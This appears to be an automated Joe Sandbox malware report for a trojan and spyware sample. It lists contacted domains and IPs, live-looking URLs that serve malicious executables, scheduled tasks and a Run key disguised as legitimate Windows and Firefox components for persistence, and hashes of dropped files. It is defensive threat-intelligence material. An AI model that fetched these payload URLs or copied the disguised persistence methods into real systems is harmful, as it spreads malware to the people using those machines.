                        		94.142.143.116
                        		truefalse
                          		high
                          cdn.discordapp.com
                          		162.159.134.233
                          		truefalse
                            		high
                            ipwhois.app
                            		136.243.172.101
                            		truefalse
                              		high
                              unicupload.top
                              		54.38.220.85
                              		truefalse
                                		high
                                host-data-coin-11.com
                                		8.209.70.0
                                		truefalse
                                  		high
                                  mta5.am0.yahoodns.net
                                  		98.136.96.91
                                  		truefalse
                                    		high
                                    c9d0e790b353537889bd47a364f5acff43c11f248.xyz
                                    		185.112.83.97
                                    		truefalse
                                      		high
                                      privacy-tools-for-you-780.com
                                      		8.209.70.0
                                      		truefalse
                                        		high
                                        microsoft-com.mail.protection.outlook.com
                                        		52.101.24.0
                                        		truefalse
                                          		high
                                          goo.su
                                          		172.67.139.105
                                          		truefalse
                                            		high
                                            transfer.sh
                                            		144.76.136.153
                                            		truefalse
                                              		high
                                              api.telegram.org
                                              		149.154.167.220
                                              		truefalse
                                                		high
                                                data-host-coin-8.com
                                                		8.209.70.0
                                                		truefalse
                                                  		high
                                                  api.ip.sb
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    yahoo.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://81.163.30.181/l2.exetrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://185.7.214.171:8080/6.phptrue
                                                      • URL Reputation: malware
                                                      		unknown
                                                      http://host-data-coin-11.com/false
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://data-host-coin-8.com/files/6961_1642089187_2359.exetrue
                                                      • 17%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://data-host-coin-8.com/game.exefalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://unicupload.top/install5.exetrue
                                                      • URL Reputation: phishing
                                                      		unknown
                                                      http://privacy-tools-for-you-780.com/downloads/toolspab3.exetrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://data-host-coin-8.com/files/7729_1642101604_1835.exetrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://81.163.30.181/l3.exetrue
                                                      • Avira URL Cloud: malware
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000003.305093646.0000024F15C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306261450.0000024F15C4E000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000003.305414851.0000024F15C41000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306242274.0000024F15C42000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000003.305414851.0000024F15C41000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306242274.0000024F15C42000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.306093914.0000024F15C13000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://api.ip.sb/ip8058.exe, 0000001F.00000002.423233100.0000000004011000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.305386938.0000024F15C45000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000003.305055330.0000024F15C68000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306331852.0000024F15C6A000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://crl.ver)svchost.exe, 00000006.00000002.567765167.000002717EE5F000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low
                                                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://activity.windows.comrsvchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306093914.0000024F15C13000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://%s.xboxlive.comsvchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		low
                                                                                              https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.305093646.0000024F15C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306261450.0000024F15C4E000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://dynamic.tsvchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000002.306201615.0000024F15C3B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://activity.windows.comsvchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		low
                                                                                                                    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmpfalse
                                                                                                                        		high

                                                                                                                        Contacted IPs

                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs

                                                                                                                        Public

                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        94.142.143.116
                                                                                                                        		patmushta.infoRussian Federation
                                                                                                                        		35196IHOR-ASRUfalse
                                                                                                                        188.166.28.199
                                                                                                                        		unknownNetherlands
                                                                                                                        		14061DIGITALOCEAN-ASNUStrue
                                                                                                                        172.67.139.105
                                                                                                                        		goo.suUnited States
                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                        86.107.197.138
                                                                                                                        		unknownRomania
                                                                                                                        		39855MOD-EUNLfalse
                                                                                                                        8.209.70.0
                                                                                                                        		host-data-coin-11.comSingapore
                                                                                                                        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                        54.38.220.85
                                                                                                                        		unicupload.topFrance
                                                                                                                        		16276OVHFRfalse
                                                                                                                        52.101.24.0
                                                                                                                        		microsoft-com.mail.protection.outlook.comUnited States
                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                        144.76.136.153
                                                                                                                        		transfer.shGermany
                                                                                                                        		24940HETZNER-ASDEfalse
                                                                                                                        81.163.30.181
                                                                                                                        		unknownRussian Federation
                                                                                                                        		58303IR-RASANAPISHTAZIRfalse
                                                                                                                        185.233.81.115
                                                                                                                        		unknownRussian Federation
                                                                                                                        		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                        185.7.214.171
                                                                                                                        		unknownFrance
                                                                                                                        		42652DELUNETDEtrue
                                                                                                                        185.186.142.166
                                                                                                                        		unknownRussian Federation
                                                                                                                        		204490ASKONTELRUtrue
                                                                                                                        162.159.134.233
                                                                                                                        		cdn.discordapp.comUnited States
                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                        Private

                                                                                                                        IP
                                                                                                                        192.168.2.1
                                                                                                                        127.0.0.1

                                                                                                                        General Information

                                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                        Analysis ID:553366
                                                                                                                        Start date:14.01.2022
                                                                                                                        Start time:19:07:30
                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                        Overall analysis duration:0h 15m 55s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:light
                                                                                                                        Sample file name:GNXG5XLBEH.exe
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                        Number of analysed new started processes analysed:48
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:1
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • HDC enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@58/62@102/15
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 100%
                                                                                                                        HDC Information:
                                                                                                                        • Successful, ratio: 38.1% (good quality ratio 25.6%)
                                                                                                                        • Quality average: 51.8%
                                                                                                                        • Quality standard deviation: 41.2%
                                                                                                                        HCA Information:Failed
                                                                                                                        Cookbook Comments:
                                                                                                                        • Adjust boot time
                                                                                                                        • Enable AMSI
                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                        Warnings:
                                                                                                                        Show All
                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                                                                                                                        • Excluded IPs from analysis (whitelisted): 23.35.236.56, 80.67.82.211, 80.67.82.235, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 52.182.143.212, 104.26.12.31, 104.26.13.31, 172.67.75.172
                                                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ctldl.windowsupdate.com, iplogger.org, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                        Simulations

                                                                                                                        Behavior and APIs

                                                                                                                        TimeTypeDescription
                                                                                                                        19:08:35API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                        19:09:09Task SchedulerRun new task: Firefox Default Browser Agent B475E6AC46161B97 path: C:\Users\user\AppData\Roaming\ttfssdi
                                                                                                                        19:09:26API Interceptor1x Sleep call for process: 6BA5.exe modified
                                                                                                                        19:09:45API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                        19:10:08API Interceptor1x Sleep call for process: explorer.exe modified
                                                                                                                        19:10:47Task SchedulerRun new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                                                                                        19:10:47AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RegHost C:\Users\user\AppData\Roaming\Microsoft\RegHost.exe

                                                                                                                        Joe Sandbox View / Context

                                                                                                                        IPs

                                                                                                                        No context

                                                                                                                        Domains

                                                                                                                        No context

                                                                                                                        ASN

                                                                                                                        No context

                                                                                                                        JA3 Fingerprints

                                                                                                                        No context

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:MPEG-4 LOAS
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1310720
                                                                                                                        Entropy (8bit):0.2486023385576548
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4V:BJiRdwfu2SRU4V
                                                                                                                        MD5:32D17CCD2B6339DF019EBB675E860FAF
                                                                                                                        SHA1:9797760F17F157597E26E0060638986E6653A7F9
                                                                                                                        SHA-256:4FA5B39006989138CDF98AE11DD5855CF9909200A2AC8666B1CB6BB45B949A0F
                                                                                                                        SHA-512:B922ACC6838D46E0D3E7D4895C6451828A122450CC7BC6FC98880FA25807A3B7A486F57970E77AAB2E513BA80B12ECCC753FEA9020C81093DE4BF0954D4A702B
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x57ece8f3, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):786432
                                                                                                                        Entropy (8bit):0.25069143755463874
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:s+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                        MD5:F7E6A2DE3097C7FFE9639C74B6A26D82
                                                                                                                        SHA1:D158073CE723A78BDBC831702D34FAA27FEA317A
                                                                                                                        SHA-256:6C65A26815CE80E9E63CA682743B45BB40FE45C91DE0C225865CE390D2C16B7B
                                                                                                                        SHA-512:DC20BD49475F3778501D018B892C1D9F7C3F01CD5A1FF5B289D1C4B264011C536747BEFD743B61868B670B800956F2C6D7A18301F4520A422E8E8F0CD672D3B1
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: W...... ................e.f.3...w........................&..........w..#....z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................}.#....z.....................o#....z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):16384
                                                                                                                        Entropy (8bit):0.07710005765895223
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:faG1EvGU3TJl/bJdAtiVvmf4/All3Vkttlmlnl:FQGiTJt4bf4A3
                                                                                                                        MD5:4C83DD7FB6BC1F021316190F961B5B91
                                                                                                                        SHA1:1B42B2D8F7EC7E5CB77888C6057447D07C427B03
                                                                                                                        SHA-256:9E9A916A5E9AA99FACADC3DB55432377A47B40608C3DFD87819FCCA77FFBB86B
                                                                                                                        SHA-512:EE335F572DD2D1B46AD21437F987263683EA96489A3F2F0D548761FC4EDC13FA1ED933455E7459F28AE54C56E2B4452CEF08A01AB1CB16611CF2106132D47E75
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: .Qk......................................3...w..#....z.......w...............w.......w....:O.....w.....................o#....z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5BBC.exe_362029c6c23990d576b7266aec72f8f83ce9e419_c52cd5fe_0e289cc1\Report.wer
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):65536
                                                                                                                        Entropy (8bit):0.8116740932612948
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:J3Fs18LHzErOQoJ7R3V6tpXIQcQec6tycEfcw3++HbHg/8BRTf3o8Fa9iVfOyWYV:Ja4Hzf8HQ0lzjIq/u7sXS274ItH
                                                                                                                        MD5:424949616D212EF0F10948818A1A9A93
                                                                                                                        SHA1:5A7114CD9918ACCCDE826C09676AC83B761A6756
                                                                                                                        SHA-256:15964ACF293606ACCA72747608CB3B0E5A1C1DDD56F25D416D51331E4C8F1530
                                                                                                                        SHA-512:071C070AA2CF180648F3FC89CBE6D660D45C99BAE79ADF8AE40160BC10BD3779EDC5AE45D76C3D2B5E962B62607D64BC7BBC5C3158D964295636DEB706A48D16
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.8.9.7.6.5.6.5.4.7.3.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.8.9.7.8.3.6.0.7.8.1.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.7.2.5.e.b.b.-.a.d.a.d.-.4.c.1.2.-.8.e.4.7.-.7.f.2.6.2.e.0.6.e.c.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.2.4.f.8.0.4.-.4.b.6.c.-.4.d.d.b.-.a.a.d.3.-.b.0.f.b.0.1.9.d.6.8.0.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.B.B.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.c.c.-.0.0.0.1.-.0.0.1.6.-.9.d.5.2.-.a.d.4.6.b.d.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.1.a.b.d.2.2.a.2.e.e.a.9.2.b.8.a.7.f.d.5.0.e.2.3.1.4.5.a.3.2.7.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.5.B.B.C...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F4.tmp.txt
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):13340
                                                                                                                        Entropy (8bit):2.69625050451798
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:9GiZYWdtNxdSYAYHWOwPHcUYEZ3zt0iHFaoowSpmdJaOKGMvlIVlW1C3:9jZDcXLdySJaOKGMv6V81C3
                                                                                                                        MD5:72F230E559D353F527212903830DCBB6
                                                                                                                        SHA1:A46C90A7E6FF357384B1ADDC560178F5453B2CD8
                                                                                                                        SHA-256:47F8457ED2B41853D2EFCEC7FB02DE8E0C19F5F89FE17CB67FD151109DE185E4
                                                                                                                        SHA-512:68501EFCBDBD6560DCC2868A088413BD3FAF7E692102EEDF5814416AEB942499813CD202D3284CD2867B98CAFF40F3EE4CA97CA2C7EAA0D1314178514A0F6DC1
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERD849.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Sat Jan 15 03:09:27 2022, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):36668
                                                                                                                        Entropy (8bit):2.117103937458852
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:5ZqT4MxcyQbNOeh0c9kk8JzTpYL4Sjtu30PIG3Z8IF:oQ0e83tiLx4EPLF
                                                                                                                        MD5:496E92D721F8E10B39B44D0F4CA6D89D
                                                                                                                        SHA1:AE388E1DC8882F735980D0460D10BFFC69AF9B79
                                                                                                                        SHA-256:91FC0F6EA2F1BCBF168B57787F820DB2F41B77E3D0469B364F413E72E8937C7B
                                                                                                                        SHA-512:0BD89C72EC7066EE6AD1F53AD6B2873E3616A5D5A520E3FB812AA332D301FBE47B5076CBE517C0BADF23F35F7960830D421CCA5F8578E20CFBB820DE84B3177F
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MDMP....... ........:.a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T............:.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE171.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8390
                                                                                                                        Entropy (8bit):3.7011350482745184
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi6md6d6YIWSULgmfPRSDxCpDx89bdZsf1Dfm:RrlsNi56d6Y5SULgmfPRSzdyf1C
                                                                                                                        MD5:968F3AF271FD4CE28C40F73590BCA036
                                                                                                                        SHA1:77A499C5AD4A009DD85C5689FECEAD99CDF9DB95
